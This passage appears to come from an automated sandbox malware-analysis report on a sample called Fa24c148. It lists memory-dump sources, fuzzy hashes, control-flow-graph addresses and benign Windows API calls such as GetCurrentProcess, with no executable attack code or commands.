                                                                                                    • Instruction ID: bae4dfb49f1feae4c04595882e71e1b98e53f40e33b94749f3b996cbac4c9a9e
                                                                                                    • Opcode Fuzzy Hash: 0235cdf3f965ccf02b0fc3f66a40559b7bc0dfea10bfec40978b6cb72b5a8545
                                                                                                    • Instruction Fuzzy Hash: A2819E74E00618CFDB04DFA9C995A9DBBB2FF89300F608129E805BB364DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5ca9c30e2cc16a355dc67291b4dc023f4698aa0d9e0c80ef72356ba350f9229
                                                                                                    • Instruction ID: 4292b1a76845ef1d1abf50a320ee163283efa6b4d6f7be12e135aeff190af917
                                                                                                    • Opcode Fuzzy Hash: b5ca9c30e2cc16a355dc67291b4dc023f4698aa0d9e0c80ef72356ba350f9229
                                                                                                    • Instruction Fuzzy Hash: 38819E74E00618CFDB04DFA9C994A9DBBB2FF89304F608169E805BB364DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b1d4141ea5ee9b05be5607666d56054459fde7c8a98fbfe634bd312949452997
                                                                                                    • Instruction ID: 78d29a8ba52bfda628aeb55f8f73a2b2b2f400f0d0995ffcf0a6ec345fda9d3c
                                                                                                    • Opcode Fuzzy Hash: b1d4141ea5ee9b05be5607666d56054459fde7c8a98fbfe634bd312949452997
                                                                                                    • Instruction Fuzzy Hash: D1819E74E00618CFEB04DFA9C994A9DBBB2FF89304F608129E405BB364DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 13c99bbec9fb56468c459fd253527db0b778c164261eacbff7c97771b4d689ee
                                                                                                    • Instruction ID: 197f326610807f827f6461526e64411e435ba092ced773c88bc9512356cc6a96
                                                                                                    • Opcode Fuzzy Hash: 13c99bbec9fb56468c459fd253527db0b778c164261eacbff7c97771b4d689ee
                                                                                                    • Instruction Fuzzy Hash: 8A818E74E00618CFDB04DFA9C994A9DBBB2FF89304F608129E405BB364DB359986DF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce96e2d9265033a3227d7601f04f00a6cc47d4a0b2ebb78388bae86b46a13ead
                                                                                                    • Instruction ID: 1a36aee9d0977c73fe3a9b8b6896b1856c4286a88ac284a85fcdbf4bb2bd006c
                                                                                                    • Opcode Fuzzy Hash: ce96e2d9265033a3227d7601f04f00a6cc47d4a0b2ebb78388bae86b46a13ead
                                                                                                    • Instruction Fuzzy Hash: F7819F74E412289FDB65DF69D990BDDBBB2BF89300F1080EAD849A7260DB315E81CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4bb4c9d919aa1d6f56a7a2c6a5fcad0a84c31499588de6230ff4ecbf10bc002d
                                                                                                    • Instruction ID: 21c2bc92a363ed788e340f93a8e9d990e3ee9b4e7fa8a2d74969285f7b9ef3f6
                                                                                                    • Opcode Fuzzy Hash: 4bb4c9d919aa1d6f56a7a2c6a5fcad0a84c31499588de6230ff4ecbf10bc002d
                                                                                                    • Instruction Fuzzy Hash: 678196B5E016198FEB68CF6AC954B9DBBF2BF88300F14C1E9D408A7254DB744A85CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 304475ae5ce2c7ab82c19e7dcdd7dda9d5fe6c805b5599437437071e45be0587
                                                                                                    • Instruction ID: cbdc9560420672a65808d5ca885adeb50d7edb8f852133f4321a178aab2c0880
                                                                                                    • Opcode Fuzzy Hash: 304475ae5ce2c7ab82c19e7dcdd7dda9d5fe6c805b5599437437071e45be0587
                                                                                                    • Instruction Fuzzy Hash: A851A574E00208DFDB18DFAAD984A9EBBF2FF88300F249129E815AB365DB315945CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a22d54be4775f1f6044e51aa243ba025a50e3a8a10fa8ecba36ef2dc73c95d8
                                                                                                    • Instruction ID: c42814ffc1c1ae20d6354acb1781b71dc0f123397da6a025a2ee3c4896bbc3de
                                                                                                    • Opcode Fuzzy Hash: 2a22d54be4775f1f6044e51aa243ba025a50e3a8a10fa8ecba36ef2dc73c95d8
                                                                                                    • Instruction Fuzzy Hash: CE51A474E00208DFDB18DFAAD984A9DBBF2FF88300F249529E815AB365DB319945CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68053b8a82f93e2ff9d9d8edaa4df3ac520fe52c5065115a6fcc5c7b11545b9d
                                                                                                    • Instruction ID: 610c846d6c56a53ab2f60e89bc53055a4542e825cf86786317df77dd7e579ebb
                                                                                                    • Opcode Fuzzy Hash: 68053b8a82f93e2ff9d9d8edaa4df3ac520fe52c5065115a6fcc5c7b11545b9d
                                                                                                    • Instruction Fuzzy Hash: 84519474E012189FDB44DFA9D9849DDBBF2FF89300F209169E809AB365DB309905CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955971809.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367b0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e51af0bd47cfe5b6b54b2edfcd879c9a58387ff936152fc4c14843fb54f3fe50
                                                                                                    • Instruction ID: 1e16cef52949d5150c015ae7efd77f2206866d992690bfc2371e6b6568be3ff8
                                                                                                    • Opcode Fuzzy Hash: e51af0bd47cfe5b6b54b2edfcd879c9a58387ff936152fc4c14843fb54f3fe50
                                                                                                    • Instruction Fuzzy Hash: 07518F71D043588FEF14CFA6D8942DDBBB2BF8A304FA0D06AC514AB256EB305956CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955971809.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367b0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34a17e7929c2fbb801bdc71d202451e885b45c068526a3b436281912db975db9
                                                                                                    • Instruction ID: 8edb808b2dfbe189ba2cc3911e83ab85c3a47c4f9f2622b310dbea1f17289209
                                                                                                    • Opcode Fuzzy Hash: 34a17e7929c2fbb801bdc71d202451e885b45c068526a3b436281912db975db9
                                                                                                    • Instruction Fuzzy Hash: D2414C74D007188BEF24CFAAD85479DBBF2BF89348FA0D16AD518AB255EB304916CF10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 85de2df68d962779743df9992cfe0a660d6aa29d863d69ae4899818326c05725
                                                                                                    • Instruction ID: 66bf085ca5574fe6e23336f4412dd02b4f4e980e6200ac3fb4d1070a63909c6f
                                                                                                    • Opcode Fuzzy Hash: 85de2df68d962779743df9992cfe0a660d6aa29d863d69ae4899818326c05725
                                                                                                    • Instruction Fuzzy Hash: D6411274E002188BEB08CFBAD8546DEBBF2BF89304F60D06AD418AB355EB355946CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955971809.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367b0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8c297fb1ec3044d0e90aa9e1812cac72cf74f364c098c5254dca6c7965f3140f
                                                                                                    • Instruction ID: ffa2726baad8d4b4809bcab1066f4350d90fd936b1427a18c282ffab881d257d
                                                                                                    • Opcode Fuzzy Hash: 8c297fb1ec3044d0e90aa9e1812cac72cf74f364c098c5254dca6c7965f3140f
                                                                                                    • Instruction Fuzzy Hash: 7E4125B4E002188BEF14CFAAD8447DEBBF2BF89304F60D06AD518AB255EB345956CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 176274813d5d679df6d776a2f6ac5147ff3ad272841a965677c0a5bcdba06dce
                                                                                                    • Instruction ID: 07a2d2203d1193f350899b6efd06497db1c836f2818adb0ea5efd81e467bac85
                                                                                                    • Opcode Fuzzy Hash: 176274813d5d679df6d776a2f6ac5147ff3ad272841a965677c0a5bcdba06dce
                                                                                                    • Instruction Fuzzy Hash: 0A419BB1E016588BEB58CF6BD94478EFAF3AFC9304F14C1A9D40CA6254DB750A858F51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8c69046fa2c51ae7b388a24a447af8ab6bb3f752a65cbc231ae714c3159cce61
                                                                                                    • Instruction ID: 91aa0af1f5d6c6d3cf9906a5a021a1627a1ccdda34e2975cb2ae1f33352c14a7
                                                                                                    • Opcode Fuzzy Hash: 8c69046fa2c51ae7b388a24a447af8ab6bb3f752a65cbc231ae714c3159cce61
                                                                                                    • Instruction Fuzzy Hash: ED41F5B1E012489BEB08DFAAD9456DEFBF2BF89300F20D12AD418BB254DB355946CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e7cb36fb17df937062311a342a1745bf2572f255e5f2c00ae79ff1e031d2260
                                                                                                    • Instruction ID: 37f3071767ace729dce3cbaa79b7d18ee4ae544e36ea7a68e5c66867be8b7066
                                                                                                    • Opcode Fuzzy Hash: 6e7cb36fb17df937062311a342a1745bf2572f255e5f2c00ae79ff1e031d2260
                                                                                                    • Instruction Fuzzy Hash: 154106B4E002188BEB04CFAAD8546DDBBF2BF89300F60D169D418BB354EB355946CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21922ae98c04434449ab704ec08edf17bc7769bccdba2cc8578bc68a784ccc1a
                                                                                                    • Instruction ID: a4b4ba989169364b471a52088443c83c1086f46d3a641cd5945c3cbdc54220fe
                                                                                                    • Opcode Fuzzy Hash: 21922ae98c04434449ab704ec08edf17bc7769bccdba2cc8578bc68a784ccc1a
                                                                                                    • Instruction Fuzzy Hash: 82311574E012498BDB04CFBAC9446DEBBF2AF8A304F64D52AD418BB254EB345946CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4480c1c3f4f2000eb00850c64de3ec63d2077e6876bdc6693744b7a8d7a4a9da
                                                                                                    • Instruction ID: 63409a0c990d3fb29515ee266bc434b4e469487a6b91d0290f1d93cca42978d5
                                                                                                    • Opcode Fuzzy Hash: 4480c1c3f4f2000eb00850c64de3ec63d2077e6876bdc6693744b7a8d7a4a9da
                                                                                                    • Instruction Fuzzy Hash: BF31F474E012488BDB04CFBAD9446DEBBF2AF8A310F64D02AD418BB254EB345946CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1005543cd83466ce6e275fbefabf5c015299248a421ddce268e31d3140a6313
                                                                                                    • Instruction ID: 1f9596b6af6cdda2842396b40304c0d0a6b66f5858f3f8327fe3eda8087f86be
                                                                                                    • Opcode Fuzzy Hash: f1005543cd83466ce6e275fbefabf5c015299248a421ddce268e31d3140a6313
                                                                                                    • Instruction Fuzzy Hash: CA31F274E002588BEB08CFEAD8446DEBBF2BF8A300F60D12AD418BB254DB345906CF55

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1222 35783fe8-35783ff1 1223 35783ffa-35783ffd 1222->1223 1224 35783ff3-35783ff8 1222->1224 1226 35783fff-35784004 1223->1226 1227 35784006-35784009 1223->1227 1225 35784032-35784035 1224->1225 1226->1225 1228 3578400b-35784010 1227->1228 1229 35784012-35784015 1227->1229 1228->1225 1230 3578401e-35784021 1229->1230 1231 35784017-3578401c 1229->1231 1232 3578402a-3578402d 1230->1232 1233 35784023-35784028 1230->1233 1231->1225 1234 3578402f 1232->1234 1235 35784036-3578408a 1232->1235 1233->1225 1234->1225 1242 3578408c-35784092 1235->1242 1243 357840c1-357840c8 1235->1243 1244 357840c9-357840d1 1242->1244 1245 35784094-357840a6 1242->1245 1243->1244 1250 357840d3-357840d7 1244->1250 1251 357840e6-357840ef 1244->1251 1246 357840ab-357840ba call 35783f90 1245->1246 1254 35784103-35784106 1246->1254 1256 357840bc-357840c0 1246->1256 1253 357840d8-357840dd 1250->1253 1250->1254 1251->1254 1255 357840f1-357840fa 1251->1255 1253->1251 1257 357840de-357840e4 1253->1257 1259 35784108-3578410e 1254->1259 1260 3578411c-3578412a 1254->1260 1255->1254 1258 357840fc-35784101 1255->1258 1256->1243 1261 35784112-35784119 1257->1261 1258->1261 1259->1246 1262 35784110 1259->1262 1264 3578412c-35784132 1260->1264 1265 35784161-35784162 1260->1265 1262->1261 1266 35784169-3578416b 1264->1266 1267 35784134-3578414b 1264->1267 1268 35784171-357841a5 1265->1268 1269 35784164-35784166 1265->1269 1273 3578416c 1266->1273 1274 35784207-35784272 1266->1274 1270 3578414d-35784150 1267->1270 1271 35784157-3578415d 1267->1271 1269->1268 1272 35784168 1269->1272 1270->1271 1275 35784152-35784155 1270->1275 1271->1268 1276 3578415f 1271->1276 1272->1266 1273->1268 1297 357842a9-357842c2 1274->1297 1298 35784274-35784287 1274->1298 1275->1271 1278 357841a8-35784200 1275->1278 1276->1265 1278->1274 1304 357842f9-357842fb 1297->1304 1305 357842c4-357842c6 1297->1305 1299 35784289-3578428d 1298->1299 1300 357842a7 1298->1300 1345 35784290 call 35783fe8 1299->1345 1346 35784290 call 35784088 1299->1346 1347 35784290 call 35784351 1299->1347 1348 35784290 call 35784385 1299->1348 1349 35784290 call 35783fd7 1299->1349 1300->1297 1302 35784293-357842a4 1308 357842fd 1304->1308 1307 357842c8-357842ca 1305->1307 1305->1308 1309 357842cc 1307->1309 1310 35784301 1307->1310 1311 35784308-35784311 1308->1311 1312 357842fe-35784300 1308->1312 1313 357842ce-357842f1 1309->1313 1314 35784303-35784306 1309->1314 1310->1314 1315 3578431c 1311->1315 1316 35784313-3578431a 1311->1316 1312->1310 1313->1304 1317 35784323-3578432c 1314->1317 1315->1317 1316->1317 1318 357843c0-357843c7 call 357844cf 1317->1318 1319 35784332-3578434f 1317->1319 1321 357843cd-357843e9 1318->1321 1319->1321 1324 357843eb-357843ee 1321->1324 1325 357843f0-3578444a 1321->1325 1324->1325 1326 35784452-3578445b 1324->1326 1325->1326 1327 3578445d-35784460 1326->1327 1328 35784462-35784498 1326->1328 1327->1328 1330 357844c7-357844cd 1327->1330 1328->1330 1339 3578449a-357844bf 1328->1339 1339->1330 1345->1302 1346->1302 1347->1302 1348->1302 1349->1302
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 'Z3U$8cq$Hbq$Hbq$Hbq$TJcq
                                                                                                    • API String ID: 0-3742257460
                                                                                                    • Opcode ID: 61234f0272246e328824440f4a066c1434ddd34d2475179540ce1dbc3319d229
                                                                                                    • Instruction ID: d5c2a3194bdf39a5f70586eb9bc3ff07de86fe179db630f57358861357502fbd
                                                                                                    • Opcode Fuzzy Hash: 61234f0272246e328824440f4a066c1434ddd34d2475179540ce1dbc3319d229
                                                                                                    • Instruction Fuzzy Hash: 53E1BD35B042448FD701DB68C891A9E7BB3FF89324F2445AAE505EF3A2CA71DD46CB91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1350 35783a50-35783a52 1351 35783a89-35783a97 1350->1351 1352 35783a54-35783a88 1350->1352 1355 35783a9d-35783a9f 1351->1355 1356 35783c73-35783c7e 1351->1356 1352->1351 1358 35783c85-35783c90 1355->1358 1359 35783aa5-35783aa9 1355->1359 1356->1358 1364 35783c97-35783ca2 1358->1364 1359->1358 1360 35783aaf-35783ae7 1359->1360 1360->1364 1372 35783aed-35783af1 1360->1372 1368 35783ca9-35783cb4 1364->1368 1373 35783cbb-35783ce7 1368->1373 1374 35783afd-35783b01 1372->1374 1375 35783af3-35783af7 1372->1375 1408 35783cee-35783d1a 1373->1408 1376 35783b0c-35783b10 1374->1376 1377 35783b03-35783b0a 1374->1377 1375->1368 1375->1374 1379 35783b28-35783b2c 1376->1379 1380 35783b12-35783b16 1376->1380 1377->1379 1383 35783b2e-35783b30 1379->1383 1384 35783b33-35783b3a 1379->1384 1381 35783b18-35783b1f 1380->1381 1382 35783b21 1380->1382 1381->1379 1382->1379 1383->1384 1386 35783b3c 1384->1386 1387 35783b43-35783b47 1384->1387 1386->1387 1389 35783bf8-35783bfb 1386->1389 1390 35783c61-35783c6c 1386->1390 1391 35783bc5-35783bc8 1386->1391 1392 35783b96-35783b99 1386->1392 1393 35783b4d-35783b51 1387->1393 1394 35783c26-35783c29 1387->1394 1397 35783bfd 1389->1397 1398 35783c02-35783c21 1389->1398 1390->1356 1395 35783bca-35783bcd 1391->1395 1396 35783bd3-35783bf6 1391->1396 1399 35783b9b-35783b9e 1392->1399 1400 35783ba4-35783bc3 1392->1400 1393->1390 1401 35783b57-35783b5a 1393->1401 1402 35783c39-35783c5c 1394->1402 1403 35783c2b-35783c2e 1394->1403 1395->1396 1395->1408 1422 35783b7f-35783b83 1396->1422 1397->1398 1398->1422 1399->1373 1399->1400 1400->1422 1404 35783b5c 1401->1404 1405 35783b61-35783b7d 1401->1405 1402->1422 1403->1402 1406 35783c30-35783c33 1403->1406 1404->1405 1405->1422 1406->1402 1410 35783d21-35783d5d 1406->1410 1408->1410 1432 35783b86 call 35783fe8 1422->1432 1433 35783b86 call 35784088 1422->1433 1434 35783b86 call 35783fd7 1422->1434 1426 35783b8c-35783b93 1432->1426 1433->1426 1434->1426
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $Hbq$Hbq$Hbq$x4Z3$x4Z3
                                                                                                    • API String ID: 0-1142271026
                                                                                                    • Opcode ID: 231191bc3b3f523aa2898c31ff207e13499ad238191d224fade8c11475e61dac
                                                                                                    • Instruction ID: 7817b056e08780455ea5d544445219f62fe7d03503268325dc517b4c80d94913
                                                                                                    • Opcode Fuzzy Hash: 231191bc3b3f523aa2898c31ff207e13499ad238191d224fade8c11475e61dac
                                                                                                    • Instruction Fuzzy Hash: 3281E3347002449BDB156F3CD85666D3AA3FFC5361F244229E81A9B3D1CF358E428B92

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1435 160ca0-160cc0 1436 160cc7-16105f call 160780 * 14 1435->1436 1437 160cc2 1435->1437 1622 161062 call 162790 1436->1622 1623 161062 call 1627f0 1436->1623 1437->1436 1516 161068-16108f call 163cc0 1626 161092 call 164285 1516->1626 1627 161092 call 1641a0 1516->1627 1519 161098-16146d call 165362 call 16c147 call 16c468 call 16c738 call 16ca08 call 16ccd8 call 16cfaa call 16d278 call 165362 1616 161473 call 16d6d4 1519->1616 1617 161473 call 16d548 1519->1617 1571 161479-1616eb call 16d548 * 15 1602 1616f1-1617aa 1571->1602 1616->1571 1617->1571 1622->1516 1623->1516 1626->1519 1627->1519
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0(\3$8!\3$LR^q$\~]30 \3$p-\3
                                                                                                    • API String ID: 0-2760187522
                                                                                                    • Opcode ID: 6f6db1f6705c9c233633a44a0a568666369efcecf0c365d15c9a3226d8394ca4
                                                                                                    • Instruction ID: 3b02f26c8a26810c08779b1a6275b4b2261cd652010e44c6098cd0e5f31ba7ad
                                                                                                    • Opcode Fuzzy Hash: 6f6db1f6705c9c233633a44a0a568666369efcecf0c365d15c9a3226d8394ca4
                                                                                                    • Instruction Fuzzy Hash: C2528074E00A19CFCB54DF64DD94A99BBB2FF89301F1081A9E409A7364DB346E86CF85

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1643 36839968-368399ff GetCurrentProcess 1647 36839a01-36839a07 1643->1647 1648 36839a08-36839a3c GetCurrentThread 1643->1648 1647->1648 1649 36839a45-36839a79 GetCurrentProcess 1648->1649 1650 36839a3e-36839a44 1648->1650 1652 36839a82-36839a9a 1649->1652 1653 36839a7b-36839a81 1649->1653 1650->1649 1664 36839a9d call 36839f20 1652->1664 1665 36839a9d call 36839b48 1652->1665 1653->1652 1655 36839aa3-36839ad2 GetCurrentThreadId 1657 36839ad4-36839ada 1655->1657 1658 36839adb-36839b3d 1655->1658 1657->1658 1664->1655 1665->1655
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 368399EE
                                                                                                    • GetCurrentThread.KERNEL32 ref: 36839A2B
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 36839A68
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 36839AC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: 895a771f8c44e634ddfc6aa4d27ef8b8961c5deadc0b735facfb3f7c415df8ac
                                                                                                    • Instruction ID: 09e863d750ab5ee40e269c4d4662b4198fd76d2eaad1defd53829b54fad657d3
                                                                                                    • Opcode Fuzzy Hash: 895a771f8c44e634ddfc6aa4d27ef8b8961c5deadc0b735facfb3f7c415df8ac
                                                                                                    • Instruction Fuzzy Hash: 4F5166B0D002498FDB10CFA9C948BDEBBF1EF89310F208159E149B7260DB749986CF65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1666 36839970-368399ff GetCurrentProcess 1670 36839a01-36839a07 1666->1670 1671 36839a08-36839a3c GetCurrentThread 1666->1671 1670->1671 1672 36839a45-36839a79 GetCurrentProcess 1671->1672 1673 36839a3e-36839a44 1671->1673 1675 36839a82-36839a9a 1672->1675 1676 36839a7b-36839a81 1672->1676 1673->1672 1687 36839a9d call 36839f20 1675->1687 1688 36839a9d call 36839b48 1675->1688 1676->1675 1678 36839aa3-36839ad2 GetCurrentThreadId 1680 36839ad4-36839ada 1678->1680 1681 36839adb-36839b3d 1678->1681 1680->1681 1687->1678 1688->1678
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 368399EE
                                                                                                    • GetCurrentThread.KERNEL32 ref: 36839A2B
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 36839A68
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 36839AC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: 3f7b5ba25006b89f4a92b7c345e8d554b1a876e76159534fb5bc7446c51ee131
                                                                                                    • Instruction ID: 1b64defa7a233f52d371fbf6138aaf2b77eb8f288345f52ff6ed13b559ff0bda
